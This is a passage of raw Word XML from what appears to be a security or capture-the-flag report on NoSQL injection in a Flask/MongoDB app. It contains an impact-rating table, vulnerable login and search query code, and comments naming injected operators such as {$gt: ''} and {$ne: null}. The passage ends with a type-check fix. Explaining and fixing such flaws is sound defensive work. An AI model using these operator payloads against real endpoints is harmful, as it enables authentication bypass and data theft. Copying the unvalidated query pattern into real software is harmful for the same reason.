              <w:t>Attack Complexity</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BC87AF4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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521BCB5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Standard JSON operators; no special conditions or timing required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="03CE8F9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10961F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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5BF29C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None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773238" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication is entirely bypassed by the injection itself</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="6EE91A7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2667A0CC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction</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70907F22" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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726A3110" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully automated; two HTTP requests capture the flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="363F39F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A81C9D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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5EC2D2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unchanged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64E202" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack stays within the MongoDB database boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0848539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29FD7BB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality</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923E558" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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1223497" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All documents from all owners exposed, including hidden system docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0BC6B96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BC377A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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A918D1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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29C712" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication bypass allows impersonation and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>write</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> access as admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="17A1A84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1C3A9A4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability</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2A4FD0C5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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308E763" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>denial of service</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> impact demonstrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FC20B3B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="4235A2F0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB89620" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>MongoDB queries are JSON objects. The application accepts JSON request bodies and passes the values directly into MongoDB queries without verifying that they are plain strings. This means an attacker can substitute a MongoDB query operator object where a string is expected, and MongoDB will execute it as legitimate query logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64014C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The two vulnerable patterns in app.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599298E0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># /login endpoint — VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFA22A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD0876" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'username': </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">username,   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># attacker sends {$in: [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...]}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A8397" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'password': password    # attacker sends {$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D700D7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047E86F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51ACCA3C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># /search endpoint — VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD73D74" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">docs = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db.documents</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="185D8D4B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'owner': </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doc_owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">},   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># attacker sends {$ne: null} instead of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58023D5A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'_id': 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F88DFE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C437C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E65A957" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># THE FIX — one line per field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E386A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>isinstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">username, str) or not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>isinstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B66EAC3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{'error': 'invalid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input'}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>), 400</w:t>
      </w:r>
    </w:p>
